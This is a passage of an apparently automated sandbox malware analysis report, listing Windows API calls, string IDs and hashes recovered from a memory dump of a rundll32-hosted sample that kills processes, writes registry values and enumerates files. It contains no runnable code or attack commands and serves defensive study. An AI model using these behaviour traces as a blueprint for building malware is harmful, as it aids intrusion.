                                                          • Instruction Fuzzy Hash: 9E11D37261461ABFD6107BA5AC48D6F3B9CFF85614F064016F909A7201DF38AC085BB1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 055919DC: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,75145520,?,?,?,0557D433,00000000,?,00000000,00000000,?), ref: 055919EE
                                                            • Part of subcall function 055919DC: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,0557D433,00000000,?,00000000,00000000,?), ref: 05591A07
                                                            • Part of subcall function 055919DC: GetCurrentThreadId.KERNEL32 ref: 05591A14
                                                            • Part of subcall function 055919DC: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0557D433,00000000,?,00000000,00000000,?), ref: 05591A20
                                                            • Part of subcall function 055919DC: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,0557D433,00000000,?,00000000,00000000,?), ref: 05591A2E
                                                            • Part of subcall function 055919DC: lstrcpy.KERNEL32(00000000), ref: 05591A50
                                                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00001ED2,?,00000000,?,?,05577963,00000000,00000000,00000004), ref: 05572C4C
                                                          • HeapFree.KERNEL32(00000000,00000000,00001ED2,?,00000000,?,?,05577963,00000000,00000000,00000004,?,00000000,?,00000000,?), ref: 05572CBF
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: FileTemp$PathTime$CreateCurrentFreeHeapNameSystemThreadlstrcpy
                                                          • String ID:
                                                          • API String ID: 2078930461-0
                                                          • Opcode ID: 82fb269f0b6e674efba2ce1e45eff06f94435ad8a9dbf71b1f89da148e98411c
                                                          • Instruction ID: a2841ab481ae66957e1112f6100b051a696f867a2bfb3ffc287c4901be1ff955
                                                          • Opcode Fuzzy Hash: 82fb269f0b6e674efba2ce1e45eff06f94435ad8a9dbf71b1f89da148e98411c
                                                          • Instruction Fuzzy Hash: 46110135250219BBD2312B21BC8EF6F3E5DFB457A0F020526F602A5180EB69585C96E0

                                                          APIs
                                                            • Part of subcall function 0557D15B: lstrlen.KERNEL32(00000000,00000000,751881D0,00000000,?,?,?,055756D1,?,00000000,00000000,?,?,05581B69,00000000,059BB188), ref: 0557D1C2
                                                            • Part of subcall function 0557D15B: sprintf.NTDLL ref: 0557D1E3
                                                          • lstrlen.KERNEL32(00000000,751881D0,?,00000000,00000000,?,?,05581B69,00000000,059BB188), ref: 055756E3
                                                          • lstrlen.KERNEL32(?,?,?,05581B69,00000000,059BB188), ref: 055756EB
                                                            • Part of subcall function 05585EA9: RtlAllocateHeap.NTDLL(00000000,?,05586423), ref: 05585EB5
                                                          • strcpy.NTDLL ref: 05575702
                                                          • lstrcat.KERNEL32(00000000,?), ref: 0557570D
                                                            • Part of subcall function 05572D8B: lstrlen.KERNEL32(?,?,?,00000000,?,0557571C,00000000,?,?,?,05581B69,00000000,059BB188), ref: 05572D9C
                                                            • Part of subcall function 0557231D: RtlFreeHeap.NTDLL(00000000,?,0557D1F9,?,00000000,751881D0,00000000,?,?,?,055756D1,?,00000000,00000000), ref: 05572329
                                                          • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,05581B69,00000000,059BB188), ref: 0557572A
                                                            • Part of subcall function 0559302E: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,05575736,00000000,?,?,05581B69,00000000,059BB188), ref: 05593038
                                                            • Part of subcall function 0559302E: _snprintf.NTDLL ref: 05593096
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                          • String ID: =
                                                          • API String ID: 2864389247-1428090586
                                                          • Opcode ID: 8c0732675958dca6530f67979c55f5afbb43c3914eeecf15c85f78b9854b7327
                                                          • Instruction ID: b154d3cabed783073b88e4f747f406aa77937cd40d669d36ae7af945934f4125
                                                          • Opcode Fuzzy Hash: 8c0732675958dca6530f67979c55f5afbb43c3914eeecf15c85f78b9854b7327
                                                          • Instruction Fuzzy Hash: 3911A037A1052EB787127BBAACC8C6E3AADBEC66907050056F505E7200DF78DD0697E0

                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 05589D20
                                                          • wcstombs.NTDLL ref: 05589D31
                                                            • Part of subcall function 05585DF9: StrChrA.SHLWAPI(?,0000002E,00000000,?,?,00000000,05580CCA,00000000,?,00000000,?,?,?,?,?,?), ref: 05585E0B
                                                            • Part of subcall function 05585DF9: StrChrA.SHLWAPI(?,00000020,?,00000000,05580CCA,00000000,?,00000000,?,?,?,?,?,?), ref: 05585E1A
                                                          • OpenProcess.KERNEL32(00000001,00000000,?,00000000), ref: 05589D52
                                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 05589D61
                                                          • CloseHandle.KERNEL32(00000000), ref: 05589D68
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 05589D77
                                                          • WaitForSingleObject.KERNEL32(00000000), ref: 05589D87
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: HeapProcess$AllocateCloseFreeHandleObjectOpenSingleTerminateWaitwcstombs
                                                          • String ID:
                                                          • API String ID: 417118235-0
                                                          • Opcode ID: dbd0ac2525bf37e7dbfc780786b4822553275495e634afd79861ecdcf1965bb8
                                                          • Instruction ID: e4e251907dbbd159dd3d40bd55db9cc001c3e93a9802ed83c26b106dc761df36
                                                          • Opcode Fuzzy Hash: dbd0ac2525bf37e7dbfc780786b4822553275495e634afd79861ecdcf1965bb8
                                                          • Instruction Fuzzy Hash: 92110131105606FBEB216B54DC8AFBE7FB9FF00355F010012F902A6180CBB9E858EBA4

                                                          APIs
                                                            • Part of subcall function 055919DC: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,75145520,?,?,?,0557D433,00000000,?,00000000,00000000,?), ref: 055919EE
                                                            • Part of subcall function 055919DC: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,0557D433,00000000,?,00000000,00000000,?), ref: 05591A07
                                                            • Part of subcall function 055919DC: GetCurrentThreadId.KERNEL32 ref: 05591A14
                                                            • Part of subcall function 055919DC: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0557D433,00000000,?,00000000,00000000,?), ref: 05591A20
                                                            • Part of subcall function 055919DC: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,0557D433,00000000,?,00000000,00000000,?), ref: 05591A2E
                                                            • Part of subcall function 055919DC: lstrcpy.KERNEL32(00000000), ref: 05591A50
                                                          • lstrcpy.KERNEL32(-000000FC,00000000), ref: 055829E0
                                                          • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,0557677B,?,?,?), ref: 055829F2
                                                          • GetTickCount.KERNEL32 ref: 055829FD
                                                          • GetTempFileNameA.KERNEL32(00000000,00000000,00000000,?,00002365,00000000,?,0557677B,?,?,?), ref: 05582A09
                                                          • lstrcpy.KERNEL32(00000000), ref: 05582A23
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Temp$Filelstrcpy$NamePathTime$CountCreateCurrentDirectorySystemThreadTick
                                                          • String ID: \Low
                                                          • API String ID: 1629304206-4112222293
                                                          • Opcode ID: 8e5649f567339a49cf0619c93dac08a915626b575334c0c94668525658b4ad7e
                                                          • Instruction ID: fd0937c6224ba8834e308a92c5019fe272683a4ebaa84037bc6b9c62645a0f15
                                                          • Opcode Fuzzy Hash: 8e5649f567339a49cf0619c93dac08a915626b575334c0c94668525658b4ad7e
                                                          • Instruction Fuzzy Hash: 60012E356156297BD6216B76AC8EFBF3F9CFF06251F020022F101E2140CFACE9098AB4

                                                          APIs
                                                          • wsprintfA.USER32 ref: 05592C19
                                                          • CreateWaitableTimerA.KERNEL32(00000000,00000001,?), ref: 05592C2B
                                                          • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 05592C55
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 05592C68
                                                          • CloseHandle.KERNEL32(?), ref: 05592C71
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: TimerWaitable$CloseCreateHandleMultipleObjectsWaitwsprintf
                                                          • String ID: 0x%08X
                                                          • API String ID: 603522830-3182613153
                                                          • Opcode ID: 025ac8afd19ca8a71b745f4f7fcd6632f0c4131f4eb4e29878714fcd39c40171
                                                          • Instruction ID: 1d759b39933249f722ad62e4d5de13da6ecf41aae188ef66d72f4fab3f29e92f
                                                          • Opcode Fuzzy Hash: 025ac8afd19ca8a71b745f4f7fcd6632f0c4131f4eb4e29878714fcd39c40171
                                                          • Instruction Fuzzy Hash: 93015E71900119BBDB109BA4DC4ADEF7F7CFF05354F004115F516E2181DB79A609DBA0

                                                          APIs
                                                            • Part of subcall function 05585EA9: RtlAllocateHeap.NTDLL(00000000,?,05586423), ref: 05585EB5
                                                          • GetLastError.KERNEL32(?,?,?,00001000), ref: 05577267
                                                          • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 055772EC
                                                          • CloseHandle.KERNEL32(00000000), ref: 05577306
                                                          • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 0557733B
                                                            • Part of subcall function 05582936: RtlReAllocateHeap.NTDLL(00000000,?,?,055772AA), ref: 05582946
                                                          • WaitForSingleObject.KERNEL32(?,00000064), ref: 055773BD
                                                          • CloseHandle.KERNEL32(?), ref: 055773E4
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: AllocateCloseHandleHeapObjectSingleWait$ErrorLastOpenProcess
                                                          • String ID:
                                                          • API String ID: 3115907006-0
                                                          • Opcode ID: 8b69feb5844ae59893a38b48f73ee304f4357e31cdef0bc3089e628adc2cb70b
                                                          • Instruction ID: 08b4fc44edf491a2d3076e0445553589df8aa6cd74d4a720a4cf9d02bae8b3bd
                                                          • Opcode Fuzzy Hash: 8b69feb5844ae59893a38b48f73ee304f4357e31cdef0bc3089e628adc2cb70b
                                                          • Instruction Fuzzy Hash: 7D813871E10219EFDF11DFA4E984AADBBB6FF08344F158459E91AAB250D730A950CFA0

                                                          APIs
                                                            • Part of subcall function 055714A0: lstrlenW.KERNEL32(?,?,00000000,?,00000250,?,77A31120), ref: 055714EC
                                                            • Part of subcall function 055714A0: lstrlenW.KERNEL32(?,?,77A31120), ref: 055714F8
                                                            • Part of subcall function 055714A0: memset.NTDLL ref: 05571540
                                                            • Part of subcall function 055714A0: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0557155B
                                                            • Part of subcall function 055714A0: lstrlenW.KERNEL32(0000002C), ref: 05571593
                                                            • Part of subcall function 055714A0: lstrlenW.KERNEL32(?), ref: 0557159B
                                                            • Part of subcall function 055714A0: memset.NTDLL ref: 055715BE
                                                            • Part of subcall function 055714A0: wcscpy.NTDLL ref: 055715D0
                                                          • WaitForSingleObject.KERNEL32(00000000,?,059B993C,?,00000000,00000000,00000001), ref: 0557D2AD
                                                          • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0557D2E7
                                                          • RegSetValueExA.ADVAPI32(?,?,00000000,00000004,00000000,00000004), ref: 0557D30A
                                                          • RegCloseKey.ADVAPI32(?), ref: 0557D313
                                                          • WaitForSingleObject.KERNEL32(00000000), ref: 0557D377
                                                          • RtlExitUserThread.NTDLL(?), ref: 0557D3AD
                                                            • Part of subcall function 05580538: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000008,00000000,00000000,?,?,0558820A,00000000,?,?), ref: 05580556
                                                            • Part of subcall function 05580538: GetFileSize.KERNEL32(00000000,00000000,?,?,0558820A,00000000,?,?,?,00000000,?,05582174,?,?,?), ref: 05580566
                                                            • Part of subcall function 05580538: CloseHandle.KERNEL32(000000FF,?,?,0558820A,00000000,?,?,?,00000000,?,05582174,?,?,?), ref: 055805C8
                                                            • Part of subcall function 0558C45A: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000008,00000000,00000000,00000000,05593D7C), ref: 0558C49B
                                                            • Part of subcall function 0558C45A: GetLastError.KERNEL32 ref: 0558C4A5
                                                            • Part of subcall function 0558C45A: WaitForSingleObject.KERNEL32(000000C8), ref: 0558C4CA
                                                            • Part of subcall function 0558C45A: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 0558C4EB
                                                            • Part of subcall function 0558C45A: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 0558C513
                                                            • Part of subcall function 0558C45A: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 0558C528
                                                            • Part of subcall function 0558C45A: SetEndOfFile.KERNEL32(00000006), ref: 0558C535
                                                            • Part of subcall function 0558C45A: CloseHandle.KERNEL32(00000006), ref: 0558C54D
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: File$lstrlen$CloseCreateObjectSingleWait$Handlememset$ErrorExitFindFirstLastOpenPointerSizeThreadUserValueWritewcscpy
                                                          • String ID:
                                                          • API String ID: 90276831-0
                                                          • Opcode ID: b9afc6036ecf32060594689792ffcc11db2085a9311e1d9d449c647285684fe7
                                                          • Instruction ID: aa7fb924b957b826d2e03205f2c72a42b8d95b91fb64cd86280c9b20c0e0e424
                                                          • Opcode Fuzzy Hash: b9afc6036ecf32060594689792ffcc11db2085a9311e1d9d449c647285684fe7
                                                          • Instruction Fuzzy Hash: A0516271A10209AFDB10DFA5E88AEAE7BF9FF08314F014056F504E7250EB78A949EB54

                                                          APIs
                                                          • RtlImageNtHeader.NTDLL(?), ref: 05577CD7
                                                            • Part of subcall function 055760A2: lstrlenW.KERNEL32(00000000,00000000,00000094,?,00000000,?,?,05577CF7,?), ref: 055760CE
                                                            • Part of subcall function 055760A2: RtlAllocateHeap.NTDLL(00000000,?), ref: 055760E0
                                                            • Part of subcall function 055760A2: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,05577CF7,?), ref: 055760FD
                                                            • Part of subcall function 055760A2: lstrlenW.KERNEL32(00000000,?,?,05577CF7,?), ref: 05576109
                                                            • Part of subcall function 055760A2: HeapFree.KERNEL32(00000000,00000000,?,?,05577CF7,?), ref: 0557611D
                                                          • RtlEnterCriticalSection.NTDLL(00000000), ref: 05577D0F
                                                          • CloseHandle.KERNEL32(?), ref: 05577D1D
                                                          • HeapFree.KERNEL32(00000000,?,?,00000001,?,?,00001000,?,?,00001000), ref: 05577DEF
                                                          • RtlLeaveCriticalSection.NTDLL(00000000), ref: 05577DFE
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,00001000,?,?,00001000), ref: 05577E11
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heap$Free$CriticalSectionlstrlen$AllocateCloseCreateDirectoryEnterHandleHeaderImageLeave
                                                          • String ID:
                                                          • API String ID: 1719504581-0
                                                          • Opcode ID: 7102ede0666c3a1999720c7463da4a0e3ba35f1418ae88a9fbc22b6648cf6332
                                                          • Instruction ID: 59849f3aae760a3a91ef2ddc712319267ea64a497b9c87311442e236cca4456b
                                                          • Opcode Fuzzy Hash: 7102ede0666c3a1999720c7463da4a0e3ba35f1418ae88a9fbc22b6648cf6332
                                                          • Instruction Fuzzy Hash: 5941B43162070AEBDB21DFA4F885EAA7B79FF48740F050426F811AB110DB74EE58DB90

                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ec61880880f9b3ead56e9133bbd2f82ec55de1b97e19be8734e9ad3e5cb34dcb
                                                          • Instruction ID: 72ab24247a05c5bd0df3dba0c078bc10b184c48adc126f7f772e77c4315324e5
                                                          • Opcode Fuzzy Hash: ec61880880f9b3ead56e9133bbd2f82ec55de1b97e19be8734e9ad3e5cb34dcb
                                                          • Instruction Fuzzy Hash: 0D41B271604705DFE720AFA59C8A93BBBFDBB84360B114A2EF5A7D21C0EB709804CB51

                                                          APIs
                                                            • Part of subcall function 0558F274: lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,0558974F,00000000,00000000,00000000,05593D7C,00000000,00000000,00000006), ref: 0558F283
                                                            • Part of subcall function 0558F274: mbstowcs.NTDLL ref: 0558F29F
                                                          • lstrlenW.KERNEL32(00000000,?), ref: 05572162
                                                            • Part of subcall function 055714A0: lstrlenW.KERNEL32(?,?,00000000,?,00000250,?,77A31120), ref: 055714EC
                                                            • Part of subcall function 055714A0: lstrlenW.KERNEL32(?,?,77A31120), ref: 055714F8
                                                            • Part of subcall function 055714A0: memset.NTDLL ref: 05571540
                                                            • Part of subcall function 055714A0: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0557155B
                                                            • Part of subcall function 055714A0: lstrlenW.KERNEL32(0000002C), ref: 05571593
                                                            • Part of subcall function 055714A0: lstrlenW.KERNEL32(?), ref: 0557159B
                                                            • Part of subcall function 055714A0: memset.NTDLL ref: 055715BE
                                                            • Part of subcall function 055714A0: wcscpy.NTDLL ref: 055715D0
                                                          • PathFindFileNameW.SHLWAPI(00000000,00000000,?,?,00000000,00000000,00000000), ref: 05572183
                                                          • lstrlenW.KERNEL32(?), ref: 055721AD
                                                            • Part of subcall function 055714A0: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 055715F6
                                                            • Part of subcall function 055714A0: RtlEnterCriticalSection.NTDLL(?), ref: 0557162B
                                                            • Part of subcall function 055714A0: RtlLeaveCriticalSection.NTDLL(?), ref: 05571647
                                                            • Part of subcall function 055714A0: FindNextFileW.KERNEL32(?,00000000), ref: 05571660
                                                            • Part of subcall function 055714A0: WaitForSingleObject.KERNEL32(00000000), ref: 05571672
                                                            • Part of subcall function 055714A0: FindClose.KERNEL32(?), ref: 05571687
                                                            • Part of subcall function 055714A0: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0557169B
                                                            • Part of subcall function 055714A0: lstrlenW.KERNEL32(0000002C), ref: 055716BD
                                                          • LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 055721CA
                                                          • WaitForSingleObject.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000), ref: 055721E1
                                                          • PathFindFileNameW.SHLWAPI(0000001E), ref: 055721F6
                                                            • Part of subcall function 05590C15: lstrlenW.KERNEL32(?,?,00000002,00000000,?,?,?,0557220D,?,0000001E,?), ref: 05590C2A
                                                            • Part of subcall function 05590C15: lstrlenW.KERNEL32(?,?,?,?,0557220D,?,0000001E,?), ref: 05590C32
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$Find$File$NamePath$CriticalFirstObjectSectionSingleWaitmemset$CloseEnterFreeLeaveLocalNextmbstowcswcscpy
                                                          • String ID:
                                                          • API String ID: 2670873185-0
                                                          • Opcode ID: a4fd01cb82f279f22cdbf611a48f98901cd14c749bcbb0db3102f5df70cb3fc8
                                                          • Instruction ID: 852e17070eccc558d7f112054366f51e2ab19e1c92b5fc6d85b9e763ecf9d82a
                                                          • Opcode Fuzzy Hash: a4fd01cb82f279f22cdbf611a48f98901cd14c749bcbb0db3102f5df70cb3fc8
                                                          • Instruction Fuzzy Hash: 7431507650820AAFCB11AFA5E888C2EBBF9FF88354F15092EF48593110DB35D919DB52
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 05581DD1
                                                          • CreateWaitableTimerA.KERNEL32(0559C1A8,00000001,?), ref: 05581DEE
                                                          • GetLastError.KERNEL32(?,00000000,05587801,00000000,00000000,00008008,?,?,00000000,00000000,?,00000001,055963D8,00000002,?,?), ref: 05581DFF
                                                            • Part of subcall function 055750C7: RegQueryValueExA.KERNEL32(00000000,055729E6,00000000,055729E6,00000000,?,?,00000000,00000000,?,?,055729E6,055729E6,?,05588593,?), ref: 055750FF
                                                            • Part of subcall function 055750C7: RtlAllocateHeap.NTDLL(00000000,?), ref: 05575113
                                                            • Part of subcall function 055750C7: RegQueryValueExA.ADVAPI32(00000000,055729E6,00000000,055729E6,00000000,?,?,00000000,00000000,?,?,055729E6,055729E6,?,05588593,?), ref: 0557512D
                                                            • Part of subcall function 055750C7: RegCloseKey.ADVAPI32(00000000,?,00000000,00000000,?,?,055729E6,055729E6,?,05588593,?,055729E6,00000000), ref: 05575157
                                                          • GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,?,?,00000000,05587801,00000000,00000000,00008008), ref: 05581E3F
                                                          • SetWaitableTimer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,05587801,00000000,00000000,00008008), ref: 05581E5E
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,05587801,00000000,00000000,00008008), ref: 05581E74
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: TimerWaitable$HeapQueryTimeValue$AllocateCloseCreateErrorFileFreeLastOpenSystem
                                                          • String ID:
                                                          • API String ID: 1835239314-0
                                                          • Opcode ID: 1a31c209cc802c1b8467488828638647c37e45285cf76592aaf4ac2f099c4ed4
                                                          • Instruction ID: 84e41310d04a314d52c504d50ac8208b91f70427d3bcf9b26d89edc16717c16c
                                                          • Opcode Fuzzy Hash: 1a31c209cc802c1b8467488828638647c37e45285cf76592aaf4ac2f099c4ed4
                                                          • Instruction Fuzzy Hash: BC313871910509EBDF20EF95D889CBFBFBAFB95750B618416F405F2100D7349A49DBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • StrChrA.SHLWAPI(?,00000020,00000000,?,00000000,?,?,?,05582C2E,00000000,?,?,?), ref: 055904A0
                                                          • StrChrA.SHLWAPI(00000001,00000020,?,?,?,05582C2E,00000000,?,?,?), ref: 055904B1
                                                            • Part of subcall function 0558BA08: lstrlen.KERNEL32(?,?,00000000,00000000,?,05571CBC,00000000,?,?,00000000,00000001), ref: 0558BA1A
                                                            • Part of subcall function 0558BA08: StrChrA.SHLWAPI(?,0000000D,?,05571CBC,00000000,?,?,00000000,00000001), ref: 0558BA52
                                                          • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 055904F1
                                                          • memcpy.NTDLL(00000000,?,00000007,?,?,?,05582C2E,00000000), ref: 0559051E
                                                          • memcpy.NTDLL(00000000,?,?,00000000,?,00000007,?,?,?,05582C2E,00000000), ref: 0559052D
                                                          • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,?,00000007,?,?,?,05582C2E,00000000), ref: 0559053F
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: memcpy$AllocateHeaplstrlen
                                                          • String ID:
                                                          • API String ID: 1819133394-0
                                                          • Opcode ID: 9c9024196588984a39e1b747e8387d10e387a9bf5cd5f77a6124f5cb0aaa80ec
                                                          • Instruction ID: 2d73fc311caa0a2486d5f5d8d24b85bf8444c4f9450ec882f4de4670c46fe13d
                                                          • Opcode Fuzzy Hash: 9c9024196588984a39e1b747e8387d10e387a9bf5cd5f77a6124f5cb0aaa80ec
                                                          • Instruction Fuzzy Hash: 6B21B072600209FFDF10DF95DC89F9ABBACFF08254F054052F909DB151E634EA449BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 0557F002
                                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0557F013
                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,00000000,00000000), ref: 0557F02E
                                                          • GetLastError.KERNEL32 ref: 0557F044
                                                          • HeapFree.KERNEL32(00000000,?), ref: 0557F056
                                                          • HeapFree.KERNEL32(00000000,?), ref: 0557F06B
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heap$ByteCharFreeMultiWide$AllocateErrorLast
                                                          • String ID:
                                                          • API String ID: 1822509305-0
                                                          • Opcode ID: 0fa5e364ca75858702f4971074551a15552e9598dc7174249ea537f28ab7c30c
                                                          • Instruction ID: 439adf739d6fb3f1c25068f2c0fb8ab9f93c6584332911ce29a9f66d062687f0
                                                          • Opcode Fuzzy Hash: 0fa5e364ca75858702f4971074551a15552e9598dc7174249ea537f28ab7c30c
                                                          • Instruction Fuzzy Hash: 9111817650101CFBCF21AB96EC49CEF7F7EFF452A0B010462F505E2150CA359A59EBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • OpenProcess.KERNEL32(00000E39,00000000,?), ref: 0557E9EC
                                                          • _strupr.NTDLL ref: 0557EA27
                                                          • lstrlen.KERNEL32(00000000), ref: 0557EA2F
                                                          • TerminateProcess.KERNEL32(00000000,00000000,?,00000000,?), ref: 0557EA6E
                                                          • CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104), ref: 0557EA75
                                                          • GetLastError.KERNEL32 ref: 0557EA7D
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Process$CloseErrorHandleLastOpenTerminate_struprlstrlen
                                                          • String ID:
                                                          • API String ID: 110452925-0
                                                          • Opcode ID: cf90bb7e4139eeeedb2c6d6230302ae111348b3275692b77d2c7f98dac0a11ab
                                                          • Instruction ID: 74c565411b09e4bea3ee7bc579c90f735b981c61fd6f42c2c0de90939550543a
                                                          • Opcode Fuzzy Hash: cf90bb7e4139eeeedb2c6d6230302ae111348b3275692b77d2c7f98dac0a11ab
                                                          • Instruction Fuzzy Hash: D011C472500608AFDF11AB74AC8ED7E7B7EFB88654B050456F903D2040EF789848DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RegOpenKeyA.ADVAPI32(80000001,?,7519F710), ref: 0558FAB4
                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0558FAE2
                                                          • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0558FAF4
                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0558FB19
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 0558FB34
                                                          • RegCloseKey.ADVAPI32(?), ref: 0558FB3E
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: HeapQueryValue$AllocateCloseFreeOpen
                                                          • String ID:
                                                          • API String ID: 170146033-0
